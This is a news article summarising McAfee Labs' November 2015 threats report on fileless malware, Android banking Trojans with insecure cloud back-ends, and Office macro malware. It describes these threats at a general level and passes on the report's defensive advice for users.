New forms of cyber attacks that can evade traditional threat detection are granting hackers access to critical information stored in personal computers and in the cloud, according to a new report.
McAfee Labs has released the quarterly McAfee Labs Threats Report: November 2015, which outlines developing cybersecurity threats, how they operate, and what steps consumers can do to prevent themselves from being affected by such threats.
The most recent report revealed three main dangers to sensitive consumer data: fileless malware, mobile banking Trojans, and macro malware. According to McAfee Labs, these threats emphasize just how quickly cybercriminals can adapt to new technologies while finding new ways to exploit old ones.
In the past, malware has always left behind a small binary somewhere on the disk, leaving it traceable to the user. Fileless malware, however, evades detection by reducing or eliminating thestorage of binaries on disk. Although the security industry has been aware of fileless malware for many years, it became more prevalent in late 2014 and early 2015.
In the first three quarters of 2015, McAfee Labs detected 74, 471 samples from three prominent fileless malware families: Kovter, Powelike, and SswKit. Presently, malware authors are capitalizing on Windows operating system applications, Windows Management Instrumentation, and Windows Powershell to perform attacks that leave no trace on the disk, making it nearly impossible for users to discover any hidden threats.
Typically, malware enters a user’s system through email or a malicious website. While some endpoint security technology is smart enough to detect fileless malware, the best safety practices for users are safe browsing and smart email operations.
Mobile banking Trojans
According to McAfee Labs’ report, “Almost every mobile app is connected to the Internet, which increases the availability of data across devices and platforms. If the mobile device fails or the user replaces it, the app’s data can usually be restored from the cloud.”
“However,” the report added, “Remotely storing and managing mobile app data can be costly and time consuming. Instead of focusing solely on the development of the app itself, developers spend time and money building and testing the “back end” of the app in the cloud, which requires specific knowledge of databases and server-side languages.”
Cloud data storage has become essential to the way personal and application data is managed and protected, creating an emphasis on the security of data stored in the cloud. This has led to major companies to focus on the “back-end” security of the cloud’s servers and databases.
Consequently, Internet companies such as Amazon, Google, and Facebook offer Backend-as-a-Service (BaaS) to provide secure data storage and management for mobile and web applications. However, McAfee Labs discovered that the implementation and configuration of those services by mobile app developers is often insecure.
Siegfriend Rasthofer of the Technishe Universität Darmstadt and Eric Bodden of Fraunhofer SIT, in collaboration with McAfee Labs, studied three chief BaaS providers: Facebook Parse, CloudMine, and Amazon AWS. The researchers discovered 56 million sets of unprotected data containing sensitive information, such as full names, email addresses, passwords, photos, money transactions, and health records. They determined that some application developers fail to follow the available security guidelines for BaaS, creating significant vulnerabilities.
Two main banking Trojan families were delineated in the study: Android/OpFake and Android/Marry, which relied primarily on sending SMS messages to perform financial fraud. During the two months that researchers analyzed these mobile banking Trojans, thousands of users—a majority located in Eastern Europe—were affected by them.
Researchers were able to study these Trojans because malware developers, like BaaS developers, are more focused on the functionality of applications as opposed to the security of those applications. Had the authors coded their malware appropriately, these Trojans would have been very difficult to study.
McAfee Labs recommends that users limit mobile app usage to well-known apps that have been validated for security by a trusted third party. Additionally, users should download mobile apps only from well-known app stores and avoid apps from unknown sources—including SMS messages and email. It is also recommended that users avoid rooting devices, so that malware cannot silently install apps.
Popular in the 1990s, macro malware is on the rise again. According to McAfee Labs, “Today’s macro malware developers are using common social engineering techniques to turn unwitting enterprise users into victims.”
Safe, legitimate macros are significant time-savers, providing a shortcut to automate a frequently performed task within applications such as Microsoft Word, the product which uses the most macros. A macro can run automatically when the user performs an operation, such as starting Microsoft Word or opening a document.
While macros can be extremely helpful to the user, Word and Excel documents, using macros and text, provide an open door for macro malware. According to the report, Microsoft Office programs have been popular targets of macro malware throughout the year, with Office macro threats at their highest level in six years.
Macro malware is spread using spam email campaigns, compromised web pages, and drive-by downloads. After download and execution, the malware acts as a normal file, remaining undetected.
McAfee Labs recommends user’s take the following steps to combat macro malware attacks: enable automatic operating system updates, configure browser security settings to medium level or above, never open unsolicited emails or unexpected attachments, use updated Microsoft Office software, and ensure that the default setting for macro security on all Office products is set to high.
As the proliferation of damaging cyberattacks continues to grow, users will become increasingly vulnerable the longer they wait to protect themselves. Regardless of the form of attack, the best practices for protecting critical data need to start with the user.